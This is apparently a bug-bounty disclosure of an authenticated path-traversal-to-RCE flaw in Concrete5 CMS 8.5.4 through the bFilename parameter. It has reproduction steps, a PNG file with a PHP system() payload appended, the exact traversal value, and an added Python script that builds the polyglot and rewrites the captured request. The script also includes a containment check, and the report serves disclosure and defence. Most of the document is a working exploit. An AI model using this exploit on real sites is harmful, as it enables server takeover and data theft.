The bFilename parameter of the index.php/ccm/system/dialogs/block/design/submit endpoint is vulnerable to remote code execution via path traversal. An authenticated attacker with rights to edit web application pages can upload a malicious PNG file containing PHP code through any attachment upload function (for example the comment section of the blog) and then supply its relative path in the bFilename parameter while editing a layout design. The file named in the vulnerable parameter is included by PHP, so the injected code runs.
Concrete5 CMS version: 8.5.4
PHP Version: 7.2.24
1) Upload png-transparent.png from the attachments using any file upload function (for example the comment section of the blog). It is an empty PNG file with the following payload at its end: <?php system("uname -a");?>
2) Get the path of the uploaded file, for example by viewing its properties:
{F1193239}
3) Navigate to the page edit constructor.
4) Select any element (for example Sidebar) and click “Add Layout” -> “Add Layout”.
5) Click on the newly added block, select “Edit Layout Design” and click Save.
6) Capture the request from step 5 in any web proxy (for example Burp Suite) and resend it with bFilename changed to the server-relative path of the uploaded file, for example:
bFilename=../../../../application/files/9316/1312/5391/png-transparent.png
{F1193235}
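The procedure above as working code, added here as an example and not part of the report or of Concrete5: it builds the PNG/PHP polyglot the report describes, shows why an image decoder never sees the PHP tail, derives the bFilename traversal value, rewrites a captured form body the way step 6 does, and shows the containment check the endpoint lacks. The web root, the include base directory (chosen only so that its depth matches the four ../ in the report's payload), the 1x1 transparent image and the sample form body are constructed assumptions; the upload path and the PHP payload are the report's.

```python
import posixpath
import struct
import zlib
from urllib.parse import parse_qsl, urlencode

# Values taken from the report.
PHP_PAYLOAD = b'<?php system("uname -a");?>'
UPLOADED_REL = "application/files/9316/1312/5391/png-transparent.png"

# Constructed assumptions: a web root, and an include base four levels below
# it so that the derived value carries the same four "../" as the report's.
WEBROOT = "/var/www/html"
INCLUDE_BASE = WEBROOT + "/dir1/dir2/dir3/dir4"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_polyglot_png(payload: bytes = PHP_PAYLOAD) -> bytes:
    """Valid 1x1 transparent RGBA PNG with the PHP payload appended after IEND.
    Image checks (magic bytes, getimagesize-style parsing) accept it; the PHP
    interpreter echoes the binary part and executes only the <?php ... ?> tail."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)  # 1x1, 8-bit, RGBA
    idat = zlib.compress(b"\x00" + bytes(4))             # filter 0 + RGBA(0,0,0,0)
    return (b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + payload)


def png_trailer(data: bytes) -> bytes:
    """Walk the chunk list like a decoder does and return what follows IEND:
    this is the part no image parser ever inspects."""
    if data[:8] != b"\x89PNG\r\n\x1a\n":
        raise ValueError("not a PNG")
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length  # length field + type + data + CRC
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("no IEND chunk")


def traversal_value(include_base: str, uploaded_abs: str) -> str:
    """Relative path from the directory the include resolves against to the
    uploaded file; this is what goes into bFilename."""
    return posixpath.relpath(uploaded_abs, include_base)


def rewrite_bfilename(captured_body: str, value: str) -> str:
    """Step 6: replace bFilename in a captured x-www-form-urlencoded body,
    leaving every other field exactly as the proxy recorded it."""
    fields = [(k, value if k == "bFilename" else v)
              for k, v in parse_qsl(captured_body, keep_blank_values=True)]
    return urlencode(fields)


def is_safe_include(include_base: str, user_value: str,
                    allowed_ext: tuple = (".php",)) -> bool:
    """The check the endpoint lacks: the normalised path must stay under the
    include base and carry an expected extension. String normalisation only;
    against a real filesystem use os.path.realpath so symlinks cannot escape."""
    if "\x00" in user_value:
        return False
    base = include_base.rstrip("/")
    resolved = posixpath.normpath(posixpath.join(base, user_value))
    return resolved.startswith(base + "/") and resolved.endswith(allowed_ext)


def demo() -> dict:
    uploaded_abs = posixpath.join(WEBROOT, UPLOADED_REL)
    bfilename = traversal_value(INCLUDE_BASE, uploaded_abs)
    captured = "bID=42&bFilename=default"  # constructed stand-in for the proxied body
    return {
        "png": build_polyglot_png(),
        "bFilename": bfilename,
        "body": rewrite_bfilename(captured, bfilename),
        "blocked": not is_safe_include(INCLUDE_BASE, bfilename),
        "legit_ok": is_safe_include(INCLUDE_BASE, "default.php"),
    }


if __name__ == "__main__":
    r = demo()
    with open("png-transparent.png", "wb") as fh:  # the file to upload in step 1
        fh.write(r["png"])
    print("bFilename=" + r["bFilename"])
    print("resent body:", r["body"])
    print("hardened check blocks it:", r["blocked"])
```

The traversal value the script derives is identical to the one in step 6, so the only site-specific inputs are the real include base (which the number of ../ in the report implies is four directories below the web root) and the upload path shown in the file properties dialog.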
This bug was found as a part of Solar Security CMS Research, with https://hackerone.com/d0bby, https://hackerone.com/wezery0, https://hackerone.com/silvereniqma in collaboration. Can you, please, add them to this report?
An authenticated attacker with page editing rights can run arbitrary system commands and obtain sensitive information.